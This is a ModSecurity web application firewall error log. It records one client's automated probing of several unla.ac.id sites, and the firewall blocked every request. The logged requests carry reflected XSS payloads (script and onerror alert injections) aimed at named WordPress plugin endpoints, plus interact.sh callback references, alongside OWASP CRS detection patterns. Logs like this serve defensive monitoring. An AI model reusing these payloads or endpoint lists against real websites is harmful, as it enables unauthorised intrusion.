[Tue Aug 29 11:56:04.617154 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAAqSw5oAAAAN"]
[Tue Aug 29 11:56:04.622188 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16ZMCo-f0AAApa-SIAAAAg"]
[Tue Aug 29 11:56:04.623616 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAAqY6PkAAAAr"]
[Tue Aug 29 11:56:04.644146 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAArB1vcAAAAV"]
[Tue Aug 29 11:56:04.659282 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16ZMCo-f0AAAq@seIAAAAM"]
[Tue Aug 29 11:56:04.670450 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16ZMCo-f0AAArB1vgAAAAV"]
[Tue Aug 29 11:56:04.690776 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO16ZMCo-f0AAAqY6PwAAAAr"]
[Tue Aug 29 11:56:04.703449 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16ZMCo-f0AAAq@seQAAAAM"]
[Tue Aug 29 11:56:04.716966 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAAqSw50AAAAN"]
[Tue Aug 29 11:56:04.745142 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAAq@seYAAAAM"]
[Tue Aug 29 11:56:04.751314 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ZMCo-f0AAAqY6P8AAAAr"]
[Tue Aug 29 11:56:05.543892 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZcCo-f0AAApa-SQAAAAg"]
[Tue Aug 29 11:56:05.579444 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZcCo-f0AAAqSw6EAAAAN"]
[Tue Aug 29 11:56:05.579603 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAArC7e4AAAAW"]
[Tue Aug 29 11:56:05.582394 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAArB1v4AAAAV"]
[Tue Aug 29 11:56:05.640571 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAArB1v8AAAAV"]
[Tue Aug 29 11:56:05.677350 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAArB1wAAAAAV"]
[Tue Aug 29 11:56:05.684704 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAAq@sesAAAAM"]
[Tue Aug 29 11:56:05.697723 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAAqeFioAAAAx"]
[Tue Aug 29 11:56:05.712819 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAAq@sewAAAAM"]
[Tue Aug 29 11:56:05.735841 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAAq@se0AAAAM"]
[Tue Aug 29 11:56:05.738327 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAArB1wMAAAAV"]
[Tue Aug 29 11:56:05.741788 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAApbUvEAAAAh"]
[Tue Aug 29 11:56:06.539130 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZsCo-f0AAApa-SsAAAAg"]
